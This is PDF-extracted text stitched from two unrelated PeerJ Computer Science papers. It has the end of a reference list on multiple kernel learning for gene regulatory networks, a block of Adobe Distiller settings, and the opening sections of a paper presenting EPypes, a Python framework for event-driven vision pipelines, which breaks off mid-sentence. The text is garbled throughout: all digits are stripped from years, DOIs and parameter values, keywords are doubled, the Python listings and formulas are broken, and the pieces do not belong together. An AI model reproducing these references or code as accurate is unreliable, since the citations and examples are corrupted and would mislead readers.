http://dx.doi.org/ . /srep http://dx.doi.org/ . /j.biosystems. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nar/gkl http://dx.doi.org/ . /bioinformatics/bth http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ margolin aa, nemenman i, basso k, wiggins c, stolovitzky g, dalla favera r, califano a. . aracne: an algorithm for the reconstruction of gene regulatory networks in a mammalian cellular context. bmc bioinformatics ( ):s doi . / - - -s -s . mordelet f, vert j-p. . sirene: supervised inference of regulatory networks. bioinformatics ( ):i –i doi . /bioinformatics/btn . nascimento ac, prudêncio rb, costa ig. . a multiple kernel learning algorithm for drug- target interaction prediction. bmc bioinformatics ( ): doi . /s - - - . pavlidis p, weston j, cai j, noble ws. . learning gene functional classifications from multiple data types. journal of computational biology ( ): – doi . / . petralia f, wang p, yang j, tu z. . integrative random forest for gene regulatory network inference. bioinformatics ( ):i –i doi . /bioinformatics/btv . raza k, alam m. . recurrent neural network based hybrid model for reconstructing gene regulatory network. computational biology and chemistry : – doi . /j.compbiolchem. . . . remli ma, mohamad ms, deris s, samah aa, omatu s, corchado jm. . cooperative enhanced scatter search with opposition-based learning schemes for parameter estimation in high dimensional kinetic models of biological systems. expert systems with applications : – doi . /j.eswa. . . . scholkopf b, smola aj. . learning with kernels: support vector machines, regularization, optimization, and beyond. cambridge: mit press. seoane ja, day in, gaunt tr, campbell c. . a pathway-based data integration framework for prediction of disease progression. bioinformatics ( ): – doi . /bioinformatics/btt . shawe-taylor j, cristianini n. . kernel methods for pattern analysis. cambridge: cambridge university press. sonnenburg s, henschel s, widmer c, behr j, zien a, bona fd, binder a, gehl c, franc v. . the shogun machine learning toolbox. journal of machine learning research : – . sonnenburg s, rätsch g, schäfer c, schölkopf b. . large scale multiple kernel learning. journal of machine learning research : – . speicher nk, pfeifer n. . integrating different data types by regularized unsupervised multiple kernel learning with application to cancer subtype discovery. bioinformatics ( ):i –i doi . /bioinformatics/btv . szklarczyk d, franceschini a, kuhn m, simonovic m, roth a, minguez p, doerks t, stark m, muller j, bork p, jensen lj, mering c. . the string database in : functional interaction networks of proteins, globally integrated and scored. nucleic acids research (suppl. ):d –d doi . /nar/gkq . tomczak k, czerwińska p, wiznerowicz m. . the cancer genome atlas (tcga): an immeasurable source of knowledge. contemporary oncology ( a):a . van laarhoven t, nabuurs sb, marchiori e. . gaussian interaction profile kernels for predicting drug-target interaction. bioinformatics ( ): – doi . /bioinformatics/btr . wani n, raza k. . multiple kernel-learning approach for medical image analysis. in: soft computing based medical image analysis. amsterdam: elsevier, – . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . /j.compbiolchem. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wani n, raza k. a. integrative approaches to reconstruct regulatory networks from multi-omics data: a review of state-of-the-art methods. computational biology and chemistry : doi . /j.compbiolchem. . . wani n, raza k. b. imtf-grn: integrative matrix tri-factorization for inference of gene regulatory networks. ieee access : – doi . /access. . . yamanishi y, vert j-p, kanehisa m. . protein network inference from multiple genomic data: a supervised approach. bioinformatics (suppl. ):i –i doi . /bioinformatics/bth . yan s, xu d, zhang b, zhang h-j, yang q, lin s. . graph embedding and extensions: a general framework for dimensionality reduction. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.compbiolchem. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /bioinformatics/bth http://dx.doi.org/ . /tpami. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. mkl-grni: a parallel multiple kernel learning approach for supervised inference of large-scale gene regulatory networks introduction related literature materials and methods results speedup efficiency redundancy quality discussion and conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice epypes: a framework for building event-driven data processing pipelines epypes: a framework for building event-driven data processing pipelines oleksandr semeniuta and petter falkman department of manufacturing and civil engineering, ntnu norwegian university of science and technology, gjøvik, norway department of electrical engineering, chalmers university of technology, gothenburg, sweden abstract many data processing systems are naturally modeled as pipelines, where data flows though a network of computational procedures. this representation is particularly suitable for computer vision algorithms, which in most cases possess complex logic and a big number of parameters to tune. in addition, online vision systems, such as those in the industrial automation context, have to communicate with other distributed nodes. when developing a vision system, one normally proceeds from ad hoc experimentation and prototyping to highly structured system integration. the early stages of this continuum are characterized with the challenges of developing a feasible algorithm, while the latter deal with composing the vision function with other components in a networked environment. in between, one strives to manage the complexity of the developed system, as well as to preserve existing knowledge. to tackle these challenges, this paper presents epypes, an architecture and python-based software framework for developing vision algorithms in a form of computational graphs and their integration with distributed systems based on publish-subscribe communication. epypes facilitates flexibility of algorithm prototyping, as well as provides a structured approach to managing algorithm logic and exposing the developed pipelines as a part of online systems. subjects computer vision, data science, robotics, software engineering keywords computer vision, computational graph, publish-subscribe, robotics, python, pipeline, distributed systems, algorithm development, event-driven systems, concurrency introduction in recent years, the increased availability of computational resources, coupled with the advances in machine learning methods and ability to gather large amounts of data, opened new possibilities of developing more advanced data-driven systems. visual data, acquired by various types of imaging equipment, constitutes one of the main inputs to advanced data analysis algorithms. in manufacturing automation, vision systems has a long history of use in combination with dedicated automated equipment and industrial robots, serving a role of contact-less sensing for, amongst others, quality inspection and robot guidance. what differentiates industrial vision solutions from general-purpose computer vision systems, is their coupling with the associated mechatronic components possessing an actuation function. this entails that most industrial vision systems operate in online mode, with their operation being synchronized with external systems by various forms of remote communication. how to cite this article semeniuta o, falkman p. . epypes: a framework for building event-driven data processing pipelines. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted january published february corresponding author oleksandr semeniuta, oleksandr.semeniuta@ntnu.no academic editor mario luca bernardi additional information and declarations can be found on page doi . /peerj-cs. copyright semeniuta and falkman distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:oleksandr.�semeniuta@�ntnu.�no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ when a new robotic system with vision sensing is developed, the early-stage system prototyping favors flexible tools and techniques that allow for iterating toward a functional solution quickly. when it comes to computer vision prototyping, the tools of the trade include opencv, as well as libraries from the python data science ecosystem, most notably numpy, scipy, pandas, scikit-learn, scikit-image, and others. vision algorithm development is a challenging task in itself, as it requires a great deal of experimentation and tuning of numerous parameters and thresholds. another challenge with early-stage prototyping of vision algorithms to be used with robotics and automation solutions is their coupling to other networked components. establishing communication interfaces can be time consuming, and is often done as a patchwork, which is difficult to maintain. many data processing systems can be logically modeled as direct graphs in which data is being gradually processed by the computational nodes. this is particularly characteristic of vision systems: after image capture and acquisition, an input image is obtained in memory and fed to a series of transformations leading to the application-specific output. such pipeline can be comprised of the steps of image enhancement, image segmentation, and feature detection (fig. ). this idea has been formalized with the abstract concept of data flow, and has found its application in many areas, including distributed data processing, machine learning, embedded software development, and digital signal processing. matlab simulink and labview are the traditional engineering tools whose programming model is based on data flow. in data engineering and data science areas, tools like apache storm, apache airflow, luigi, and dask employ explicit data flow construction and execution. needless to mention that the deep learning libraries, such as tensorflow, caffe, and theano, construct and train models as directed acyclic graphs (dags). this paper tackles the problems of both ( ) vision algorithms development and ( ) their integration into distributed environments. this is done by introducing epypes, a python library for construction and execution of computational graphs, with the built-in capability of exposing the graphs as reactive pipelines. the latter are intended to be a part of publish-subscribe systems. in addition to the software tools, this paper presents a system development method that facilitates transition from ad hoc prototyping phase to well-structured system integration phase without compromising the developers’ flexibility. image enhancement original image image segmentation enhanced image feature detection or more regions or contours features or/and other measurements external systemsprocess/scene image acquisition figure common steps of a vision pipeline. full-size doi: . /peerj-cs. /fig- the epypes implementation is available under the -clause bsd license at https://github.com/semeniuta/epypes. semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://github.com/semeniuta/epypes http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the practical applicability of the proposed framework is validated in a distributed experimental setup comprised of a robot, an image acquisition service, and an image processing component, communicating in a publish-subscribe manner using zeromq middleware. it is shown that the epypes architecture facilitates seamless transition between various deployment configurations in a distributed computing environment. this paper is structured as follows. first, the background areas are introduced, including overview of computational systems based on dags, the python data science/computer vision ecosystem, and event-based middleware. further, the epypes abstractions are presented with code examples and architectural relationships. finally, a distributed system experiment based on epypes provides a more detailed view into the runtime properties of the framework. background graph-based representation of computational systems a wide range of computational systems, particularly those with streaming behavior, can be represented as directed graphs, in which data is routed through processing nodes. not only is this representation accessible to human understanding (particularly for engineers), but it also has been used in various settings to realize improvement of the function of the systems. control engineering and signal processings has a long tradition of graphically modeling systems in a form of block diagrams. matlab simulink and labview are widely used in this context as engineering tools with formally defined abstractions. the field of cyber- physical systems (cps) makes great use of graph-based system models together with the associated models of computations (lee & seshia, ). a notable cps modeling environment is ptolemy ii. in computer science, graph-based representation of systems has been used for a range of different purposes: data flow models, task graphs (for parallel processing scheduling), symbolic representation of computational expressions (for machine learning and automatic computation of gradients), representation of concurrent process networks (e.g., communicating sequential processes), workflow languages, etc. in the software engineering community, the pipes and filters architecture applies the same ideas to data processing systems design and development. the well-known pipes mechanism of unix-like operating systems has proved to be particularly powerful when it comes to composition of multiple tools to solve a complex task. data science has seen a surge of tools based on explicit handling of data processing systems in a form of dag. many of them are intended to be run on a computing cluster, and the dag architecture in this case facilitates scheduling of parallel execution of data processing tasks. apache storm is a cluster-based stream processing engine. apache airflow is workflow management platform for batch processing on a cluster. dask is a python parallelization library that utilizes dag modeling for scaling algorithms written with numpy and pandas primitives to be used with massive datasets. semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ python data science/computer vision ecosystem the open source movement has gained a big popularity within the fields of data science, computer vision, and robotics in recent years. even though the established proprietary engineering tools are pervasive in the industrial context, they often lack flexibility and hinder a deeper understanding of how a system functions. conversely, open source tools provide community-contributed implementation of common functionality, which is flexible to use and allows for building more scalable and reproducible solutions. in computer vision, the opencv library has become a de-facto standard providing a pool of community-contributed image processing and computer vision algorithms. similarly, the point cloud library (pcl) provides open-source routines for point clouds processing. a multitude of tools from the python ecosystem are widely used for data science and scientific computing. they are built upon the numpy array library, and include pandas, scikit-learn, scikit-image, and many others. the abovementioned opencv and pcl, as well as many other low-level tools, expose python bindings, which makes it possible to perform rapid system developed with preserved high performance of the applied algorithms. events and publish-subscribe middleware an event-driven system is characterized by a discrete state space, where state transition happen on occurrence of events at sporadic time instants (cassandras & lafortune, ). in distributed systems, events are often embodied as messages sent over a network in a publish-subscribe communication system. such messages can signalize a change of a system state (change event) or a notification from an observation (status event), expressed as a tuple with a timestamp and an application-specific descriptive parameters (hinze, sachs & buchmann, ). message-based middleware provides a unified set of communication and input/output capabilities in such sense-respond systems. middleware allows to decouple the communicating components by introducing message queuing, built-in address resolution (e.g., via handling logical addresses such as topic names), and usage of a common data serialization format (magnoni, ). the defining components of a particular middleware solution are the communication protocol (transport-level tcp and udp, wire-level amqp, zeromq/zmtp, mqtt), the communication styles (request/reply, publish/subscribe), and the data serialization method (typically realized with an interface definition language like protobuf or apache thrift). many middleware solutions are based on a central broker, for example, activemq and rabbitmq. the additional hop through the broker adds a constant value to the communication latency (dworak et al., ). zeromq is an example of broker-less middleware, in which the message queuing logic runs locally within each communicating component (zeromq, ). epypes epypes is a python-based software framework that combines pipes and filters and publish-subscribe architectures. it allows to develop data processing pipelines, the behavior of which is defined by their response to events. epypes defines a computational graph, which is semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a static data structure modeling a data processing algorithm, abstractions used for execution of computational graphs, and a hierarchy of pipelines, which extend the algorithm logic defined with computational graphs to be a part of a publish-subscribe system. computational graph at the core of epypes lies compgraph, a data structure that models a data processing algorithm as a computational graph, that is, as a network of functions and data tokens. formally, a compgraph can be described as a bipartite dag g: g ¼ ðf; t; eÞ where f is a set of functions, t is a set of data tokens, and e is a set of directed edges between functions and tokens and vice-versa. the latter implies that edges of only the following two kinds are permitted: (f, ti), where f ∈ f, ti ∈ t, and (tj, g), where g ∈ f, tj ∈ t. a function f ∈ f is associated with a python callable. a token t ∈ t represents a data object of an arbitrary type. if function f correspond to a callable with m input parameters and n outputs, it has to be connected to n input and m output tokens. let inf � t denote the set of input tokens to f, and outf � t denote the set of output tokens from f. functions in g are uniquely identified by their string-based names. this allows to use the same python callable several times in the computational graph. once a computational graph g is constructed, and it conforms to the requirements of acyclicity, its execution can be scheduled. topological sort of g results in an order of vertices (functions and tokens) so that all the directed edges point from a vertex earlier in the order to a vertex later in the order. with invoking functions in this topological order, all the precedence constraints will be satisfied. for many computational procedures, one can typically distinguish between parameters carrying the primary data entities and parameters that tune the procedure. in this paper, the former are referred to as payload parameters, and the latter as hyperparameters . thus, tokens belonging to these two parameter sets of function f form the input parameter set of f: inf = pf ∪ hf. it is further presumed that all hyperparameter tokens are frozen, that is, given fixed values, during the construction of graph g. the set of non-frozen source tokens is referred to as free source tokens, and is used to provide input to the computational graph. in the computational graph example shown in fig. , rectangle vertices represent functions in the function set f = {f , f , f }, white circular vertices represent payload tokens, and gray circular vertices—hyperparameter tokens. in accordance with the previously defined notation, each function in f has the following associated token sets: f hf ¼ ft ; t g pf ¼ ft g outf ¼ ft ; t g f hf ¼ [ pf ¼ ft g outf ¼ ft g f hf ¼ ft g pf ¼ ft ; t g outf ¼ ft g token t is the only free source token, and its value is required to perform a computation. the term hyperparameters is borrowed from machine learning, where it refers to parameters that characterize a particular algorithm, as opposed to model para- meters. semantics of hyperparameter tokens in this paper is similar, although the considered computational graphs can be used to model a wide variety of algorithms. semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a concrete example consider a simple computational graph that defines a processing chain in which a color image is first converted to grayscale, then blurred with a gaussian kernel, with the blurred image further used to perform edge detection with the canny algorithm. the following listing shows the steps of the computational graph construction. importimport cv defdef grayscale (im): returnreturn cv .cvtcolor(im, cv .color_bgr gray) defdef gaussian_blur(img,kernel_size): returnreturn cv .gaussianblur(img, (kernel_size, kernel_size), ) func_dict = { ‘grayscale’: grayscale, ‘canny’: cv .canny, ‘blur’: gaussian_blur } func_io = { ‘grayscale’: (‘image,’ ‘image_gray’), ‘blur’: ((‘image_gray,’ ‘blur_kernel’),’image_blurred’), ‘canny’:((‘image_blurred,’’canny_lo,’ ‘canny_hi’), ‘edges’), } cg = compgraph(func_dict, func_io) after importing the opencv python module (cv ), two helper functions are defined for grayscaling and blurring (the function for edge detection is used as-is). the structure of the computational graph is specified as two dictionaries. the func_dict dictionary defines mapping from unique function identifiers (in this case, strings “grayscale”, “blur”, “canny”) to the respective callable objects. the func_io figure an example abstract computational graph. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dictionary defines input/output relationships between the functions in a form of tokens. each function identifier is mapped to a tuple describing input and output tokens that can be one of the following forms, depending on the respective functions’ signatures: � (x, y) for single input and single output; � ((x , ..., xm), y) for multiple inputs and single output; � (x, (y , ..., yn)) for single input and multiple outputs; � ((x , ..., xm), (y , ..., yn)) for multiple inputs and multiple outputs. an instance of compgraph is then constructed based on func_dict and func_io. to be executable, a computational graph has to be supplied to the constructor of compgraphrunner. the latter is used to store the hyperparameter tokens and schedule execution of the graph with the topological sort. internally compgraphrunner delegates storage and retrieval of token data to an instance of tokenmanager (fig. ). in the following example, we specify the gaussian blur kernel, and low/high threshold of the canny algorithm in dictionary params. the latter, together with the original computational graph cg is used to construct a compgraphrunner: hparams = { ‘blur_kernel’: , ‘canny_lo’: , ‘canny_hi’: } runner = compgraphrunner(cg, hparams) visualization of this parametrized computational graph is shown in fig. . the hyperparameter tokens are highlighted in gray. to run a compgraphrunner, its run method is invoked with keyword arguments corresponding to names and values of free source tokens. in the provided example the only free source token is image. therefore, the running syntax is the following: im = cv .imread(‘image.jpg,’cv .imread_color) runner.run(image=im) a compgraphrunner can be used as a namespace for accessing any token value by the token key. the interface for this operation is the same as for a python dictionary. compgraphrunnercompgraph bipartitedigraph tokenmanager figure class digram of epypes abstractions dealing with computational graphs. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for example, to visualize the blurred image from the computational graph in fig. using matplotlib, the following syntax is applied: plt.imshow(runner[‘image_blurred’]) pipelines to introduce additional functionality to algorithms expressed as computational graphs and transform them into runtime reactive components, a hierarchy of pipeline classes is defined. as shown in fig. , the basic building block of epypes pipelines is a node, which is a runtime counterpart to a function. an instance of node based on function f can be invoked as a callable object, with parameter values corresponding to the positional input arguments of f. a network of node instances corresponding to the graph g form a nodebasedcompgraph. the latter constitutes the main component of a pipeline, as well as its subclasses (sourcepipeline, sinkpipeline, and fullpipeline). an instance of the pipeline class is constructed similarly to the earlier example of compgraphrunner, but with the additional name argument: pipe = pipeline(‘mypipeline’, cg, hparams) because pipeline is defined as a subclass of node, its instances constitute callable objects, and are functionally equivalent to instances of node. the whole pipeline is orchestrated by an instance of compgraphrunner (fig. ). the internal structure of a pipeline is visualized in fig. . grayscale image_gray blur image_blurred canny edges canny_hi image blur_kernel canny_lo figure computational graph for edge detection. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional capabilities of a pipeline, as compared with a raw compgraphrunner, include time measurement of nodes’ durations, computation of computational graph overhead, storage of additional attributes, and other functionality added by subclassing pipeline. to allow for reactive behavior of pipelines, they are combined with event queues, which can be used for subscription to triggering events and publishing the results of data processing. to realize this, aside from pipeline, which is not reactive, three other types of pipelines, coupled with event queues, are defined. reactive pipelines operate in context of thread-based concurrency with blocking queues as the synchronization mechanism. in the python standard library, a queue.queue object can be used to communicate between two threads: the producer thread puts an object on the queue, and the consumer thread request the object and blocks until the latter becomes available. the principle of such interaction is shown in a sequence diagram in fig. . a sourcepipeline, see fig. , is a subclass of pipeline whose final output is put to the output queue qout. a sourcepipeline is in addition parametrized by fout, an output preparation function, responsible for packaging the chosen data from the pipeline tokens into a single message that gets published on qout. an instance of sourcepipeline is constructed as follows: src_pipe = sourcepipeline(‘mysourcepipeline’, cg, q_out, f_out, hparams) node pipeline sourcepipeline sinkpipeline fullpipeline eventloop compgraphrunnernodebasedcompgraph compgraph figure class digram of epypes pipelinespipelines. full-size doi: . /peerj-cs. /fig- compgraphrunner f f t t t f t t t t t �in tokenmanager figure structure of an instance of pipelinepipeline. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as an example of the output preparation function, consider a pipeline, whose computational graph contains a token with the key pose, corresponding to a d pose estimated from images. to take the data corresponding to this token and package it as a python pickle, the following function can be defined: defdef prepare_output(pipe): pose = pipe[‘pose’] wire_data = pickle.dumps(pose) returnreturn wire_data another subclass of pipeline is sinkpipeline, shown in fig. . it is meant not to be called manually, but to be triggered as an event e is announced in qin. because e can be an arbitrary object, it is necessary to map its contents to a dictionary de that describes what data should correspond to the pipeline’s free source tokens. such mapping is defined by event dispatcher function fin. an instance of sinkpipeline is constructed in a familiar way: snk_pipe = sinkpipeline(‘mysinkpipeline’, cg, q_in, f_in, hparams) the idea of event dispatcher can be illustrated by referring to the computational graph in the earlier example (fig. ). consider that e constitutes an image as a numpy.ndarray. because a compgraphrunner is invoked with keyword arguments, fin is defined to map to the required kwargs dictionary: defdef dispatch_image(im): returnreturn {‘image’: im} producer queue consumer get event get put figure sequence diagram of thread-based producer and consumer interacting through a queue. full-size doi: . /peerj-cs. /fig- qout put in compgraphrunner tokenmanager �out f f t t t f t t t t t figure structure of an instance of sourcepipelinesourcepipeline. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the behavior of waiting for an event is realized with an event loop, an instance of eventloop class, which is continuously run in a separate thread of execution. it monitors qin, and, as a new event e becomes available, invokes the associated instance of sinkpipeline (fig. ) having the kwargs from the event dispatcher: input_kwargs = self._event_dispatcher(event) self._callback_pipeline.run(��input_kwargs) finally, the most comprehensive epypes entity is fullpipeline, shown in fig. . it subclasses pipeline, and provides functionality of both reacting to a stream of incoming events in qin and publishing a subset of its processing results to qout as outgoing events. it is instantiated in the following way: snk_pipe = fullpipeline(‘myfullpipeline’, cg, q_in, q_out, f_in, f_out, hparams) epypes-based system development a distinction between a static computational graph and its runtime counterparts is realized in order to facilitate smooth system evolution from an early ad hoc development phase to a more integral whole with well-functioning reactive behavior. as shown in fig. , the development starts with components having less structure, and proceeds by extension of these components with functionality and behavior that are facilitated by the proposed tools. in the early development phase, vision algorithms, as well as other data processing routines, are prototyped using the available tool set: different alternatives can be implemented and evaluated in an interactive manner using tools like jupyter and supported by opencv and a pool of scientific python libraries (numpy, pandas, scikit-image, scikit-learn). as the result of prototyping, a collection of well-tested functions is developed. at this stage, the developer can specify computational graphs from the pool of these functions. qin get� compgraphrunner � el tokenmanager�in f f t t t f t t t t t figure structure of an instance of sinkpipelinesinkpipeline.. full-size doi: . /peerj-cs. /fig- qout put �out qin get� compgraphrunner � el tokenmanager�in f f t t t f t t t t t figure structure of an instance of fullpipelinefullpipeline.. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the process of computational graph engineering involves a great deal of prototyping itself. despite the fact that compgraph constitutes a highly-structured entity, the flexibility of its definition brings a number of advantages over coding up the algorithm as a single function. most importantly, the flat structure of the computational graph, along with graphviz-based visualization capabilities, gives a transparent view on the data flow in the developed algorithm. it also allows for incorporating several alternative branches as a part of the same graph. the uniquely-named tokens provide an isolated namespace, which is specifically useful when prototyping in a jupyter notebook. the mechanism of hyperparameter tokens allows for systematic management of the set of thresholds and other configuration values while being on a single hierarchical level (without a cascade of function calls). the well-defined structure of a computational graph facilitates automated manipulation of it, for example, extending the original graph with additional functions, union of two or more graphs, and union with renaming of functions and tokens. when a computational graph is developed, it can be used to construct pipelines. the non-reactive pipeline provides additional capabilities to the computational graph: it is runnable, includes time measurement functionality, and can be flexibly subclassed, as done in reactive pipelines (sinkpipeline, sourcepipeline, and fullpipeline). the latter are used to expose the developed algorithm in online mode. epypes use case in order to illustrate practical application of the epypes framework and show its suitability for building data processing components in distributed environments, this section presents a run time use case scenario with the associated experiment. the presented scenario demonstrates how epypes can be deployed as a part of a real distributed system (with the communication based on zeromq and protobuf) and what timing properties may be expected in this case. in particular, a major concern is how much overhead is introduced by the additional abstractions in the epypes architecture. furthermore, it is of interest how repeatable this overhead is, as well as what role it plays comparing to communication latency and the application-specific processing time. rough prototyping (jupyter 